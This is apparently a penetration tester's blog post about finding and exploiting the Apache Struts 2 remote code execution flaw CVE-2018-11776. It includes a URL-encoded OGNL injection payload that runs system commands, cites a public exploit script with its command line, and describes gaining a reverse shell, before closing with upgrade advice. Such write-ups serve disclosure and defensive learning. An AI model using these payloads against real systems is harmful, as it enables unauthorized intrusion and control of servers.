This blog is to describe my finding on a web-based application which is a very well-known vulnerability found on Apache Struts-2 RCE (Remote Code Execution).

 

History of Apache Struts-2:-

Apache Struts is one of the popular open-source frameworks and highly used by banks and government organizations. Modern, clean, elegant but security-wise struts are not having a good time. The older version happens to affect all the versions of the struts REST plugin and also it has found to impact several fortune companies. This exploit for the same has been published and a lot of web applications were getting exploited in massive ways.

 

How I Started:-

As I was hunting on few websites and I came across this link and during my recon process I came to know that it was vulnerable for Apache Struts-2 just to reconfirm and get a proper detail of the struts I used an online tool named “Contrast”. I need to give the URL to the tool and it gave me back the whole details of the Apache struts and also with the proper parameter for the same.

Contrast showing whole details of the application Contrast showing whole details of the application

Then after getting the proper parameter I tried to check those parameters on Burp Suite with some payloads.

${%23a%3dnew%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22whoami%22}).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java.io.BufferedReader(%23b),%23d%3dnew%20char[51020],%23c.read(%23d),%23screen%3d%23context.get(‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’).getWriter(),%23screen.println(%23d),%23screen.close()}”>test.action?redirect:${%23a%3dnew%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22netstat%22,%22-an%22}).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java

Payload resulted with the hostnamePayload resulted in the hostname

Then complete the vulnerability trigger by sending a malicious velocity template via GET/POST request with custom velocity template parameter in a specially crafted request, leading to RCE.

I used this payload on the generated parameters and YES it gave a proper result.

After googling few links on github I got an exploit available on the same vulnerability which was prompting for the RCE itself. Github Here.

 

We can use the docker build for the Apache struts and can add custom actions to it. I followed as the programmer has suggested in his exploit.

 

Setting up to gain reverse shell:-

  1. After doing some google search, came across a python code to gain a reverse shell on that parameter.
  2. Just by some modification in the python code, I was able to get the reverse shell.
  3. Here is the python code.  https://github.com/mazen160/struts-pwn_CVE-2018-11776
  1. Command:-python struts-pwn.py –url ‘http://example.com/demo/struts2-showcase/index.action’
  2. Then YES I got areverse shell for the same.

Reverse shell executedReverse shell executed

How to Mitigate:-

All Apache customers should upgrade to the latest version and deploy security patches within 24 hours of availability.

If you are running … Upgrade to…
Struts 2.3.x | Struts 2.3.35
Struts 2.5.x | Struts 2.5.17

That is all to get an RCE on vulnerable Apache Struts 2, you can read more on it via the following CVE ID 2018-11776.

Anyways it was FUN, Thanks for reading.

 

Author,

Sushant Kamble

Sushant Kamble (sushant@varutra.com)
Attack & Pentest Team
Varutra Consulting Pvt. Ltd.